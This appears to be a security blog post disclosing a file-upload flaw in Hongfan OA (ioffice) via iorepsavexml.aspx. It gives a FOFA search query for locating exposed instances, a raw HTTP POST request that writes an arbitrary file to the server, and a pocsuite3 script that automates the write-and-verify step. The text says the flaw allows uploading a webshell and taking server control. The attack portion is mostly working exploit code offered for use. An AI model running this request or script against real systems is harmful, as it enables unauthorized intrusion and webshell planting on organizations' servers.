Disclaimer
The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.
Vulnerability description
Hongfan OA has an arbitrary file reading vulnerability. An attacker can use this vulnerability to upload a webshell Trojan and obtain server control permissions.
fofa statement
app="红帆-ioffice" || app="红帆-HFOffice"POC plus detection
POST /ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=check.txt&filepath=/upfiles/rep/pic/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=lcluwirkrcqj42iuxfvafoq4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
12345678
After the upload is successful, visit /ioffice/upfiles/rep/pic/check.txt to check whether there is successful writing.
poc script
pocsuite framework for scripts
# _*_ coding:utf-8 _*_
# @Time : 2023/12/24
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class iorepsavexml(POCBase):
pocDesc = '''红帆OA iorepsavexml.aspx文件上传漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-24'
name = '红帆OA iorepsavexml.aspx文件上传漏洞'
def _verify(self):
result = {}
url = self.url+ '/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=check.txt&filepath=/upfiles/rep/pic/'
check_path = self.url+ "/ioffice/upfiles/rep/pic/check.txt"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'max-age=0',
'Connection': 'close',
"Cookie": "ASP.NET_SessionId=lcluwirkrcqj42iuxfvafoq4",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
data = "123456789"
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
check_response = requests.get(check_path, headers=headers, verify=False)
if check_response.status_code == 200 and '123456789' in check_response.text:
result['VerifyInfo'] = {}
return self.parse_output(result)
except Exception as e:
pass
register_poc(iorepsavexml)Script exploit
